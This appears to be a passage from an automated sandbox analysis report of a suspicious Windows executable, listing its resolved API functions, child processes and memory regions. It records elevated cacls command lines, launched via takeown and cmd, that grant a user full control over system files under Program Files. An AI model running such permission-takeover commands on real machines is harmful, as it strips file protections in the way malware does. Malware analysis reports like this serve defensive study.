| Load | GDI32.dll | base_address = 0x75030000 |
|
1 | |
| Load | USER32.dll | base_address = 0x76c70000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x742f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x74f660c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x74f66110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x74f587e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x74f65f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x74f64a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x74f65fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x74f5a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x74f5c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x74f66300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x74f59a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x74f661b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x74f5fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77704f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x74f59a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x74f579b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x74f5fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x74f592b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x74f5a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x74f66180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x74f63a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x74f58cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x74f65f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x74f52af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x74f578f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x74f52db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x74f52da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x74f57a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x74f5a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x74f59660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x74f5a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x74f5a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x74f587c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x74f58840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x74f57940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x74f59560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x74f669c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x74f66390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x74f81c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x74f668e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x74f66920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x74f66540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x776f5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x776f5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x74f826a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x776eda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x7770f190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x7770a200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x74f674f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x74f59fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x74f52d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x74f575a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x74f525e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x74f66870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x74f668c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x74f66900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x74f59700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x74f51b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77712570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x74f57920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77709920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x74f662a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x74f66590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x74f66860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x74f59680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x74f664a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x74f5a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x74f828e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x74f5a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x74f66020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x74f577b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x74f5fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x74f59a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x74f51ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x74f51da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x74f59930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x74f5a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x74f58770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x74f5fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x74f59fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x74f57910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x74f59a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x74f52dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x74f51d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x74f52b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x74f5a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x74f5a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x776ebae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x74f664f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x7756ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x7756fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x775695e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x77570680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x7756ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x7756f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x7756ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x7756ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x7756f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x775706c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x7756efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x7756f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x766dc6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x750dee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x750b55a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x750b57e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x750b9590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x750b0820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x750dfbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x76c838f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x76c9b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x76c9b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x76c87740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x76c974e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x76c9efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x76ca4ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x76c94580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x76c91540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x742f1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x742f1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x742f1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x74f5a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x74f5f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x74f57580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x74f59910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x74f66030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x74f65f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x74f65ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x74f5a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x74f5a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x776e40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x776dd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x776decf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x74f65720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x776de140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x776deb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77719990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77715540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77709dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x74f5a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x74f80a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x752c0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x74f5f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x74f5fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x74f81030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x74f5a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x74f814b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x74f5a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x74f816f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x74f59970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x75243c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x74f58710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x74f596e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-01-23 14:13:32 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #253: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #253 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:59, Reason: Child Process |
| Unmonitor | End Time: 00:04:01, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x5d8 |
| Parent PID | 0x7fc (c:\windows\syswow64\takeown.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
AB4
0x
824
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000370000 | 0x00370000 | 0x0038ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000370000 | 0x00370000 | 0x0037ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000380000 | 0x00380000 | 0x00383fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000390000 | 0x00390000 | 0x00391fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000390000 | 0x00390000 | 0x00393fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000003a0000 | 0x003a0000 | 0x003b3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000003c0000 | 0x003c0000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000400000 | 0x00400000 | 0x0043ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000440000 | 0x00440000 | 0x00443fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000450000 | 0x00450000 | 0x00450fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000460000 | 0x00460000 | 0x00461fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000470000 | 0x00470000 | 0x004affff | Private Memory | rw |
|
|
|
- |
| cacls.exe.mui | 0x004b0000 | 0x004b1fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000004c0000 | 0x004c0000 | 0x004cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004d0000 | 0x004d0000 | 0x0073ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x004d0000 | 0x0058dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000590000 | 0x00590000 | 0x005cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000640000 | 0x00640000 | 0x0073ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000740000 | 0x00740000 | 0x0081ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x00820000 | 0x00b56fff | Memory Mapped File | r |
|
|
|
- |
| cacls.exe | 0x01040000 | 0x01049fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001050000 | 0x01050000 | 0x0504ffff | Pagefile Backed Memory | - |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x743a0000 | 0x743c7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007fb50000 | 0x7fb50000 | 0x7fc4ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007fc50000 | 0x7fc50000 | 0x7fc72fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007fc76000 | 0x7fc76000 | 0x7fc78fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fc79000 | 0x7fc79000 | 0x7fc7bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fc7c000 | 0x7fc7c000 | 0x7fc7cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fc7f000 | 0x7fc7f000 | 0x7fc7ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #254: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #254 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Journal\en-US\JNTFiltr.dll.mui" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:01, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:01 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xf7c |
| Parent PID | 0xc60 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
FDC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x00000000005e0000 | 0x005e0000 | 0x005fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000005e0000 | 0x005e0000 | 0x005effff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000005f0000 | 0x005f0000 | 0x005f3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000600000 | 0x00600000 | 0x00601fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000610000 | 0x00610000 | 0x00623fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000630000 | 0x00630000 | 0x0066ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000670000 | 0x00670000 | 0x006affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000006b0000 | 0x006b0000 | 0x006b3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000006c0000 | 0x006c0000 | 0x006c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000006d0000 | 0x006d0000 | 0x006d1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x006e0000 | 0x0079dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000007a0000 | 0x007a0000 | 0x007dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000007e0000 | 0x007e0000 | 0x0081ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000880000 | 0x00880000 | 0x0088ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000890000 | 0x00890000 | 0x00a9ffff | Private Memory | rw |
|
|
|
- |
| cacls.exe | 0x01040000 | 0x01049fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001050000 | 0x01050000 | 0x0504ffff | Pagefile Backed Memory | - |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f5e0000 | 0x7f5e0000 | 0x7f6dffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f6e0000 | 0x7f6e0000 | 0x7f702fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f706000 | 0x7f706000 | 0x7f708fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f709000 | 0x7f709000 | 0x7f709fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f70c000 | 0x7f70c000 | 0x7f70cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f70d000 | 0x7f70d000 | 0x7f70ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #255: cmd.exe
37
0
| Information | Value |
|---|---|
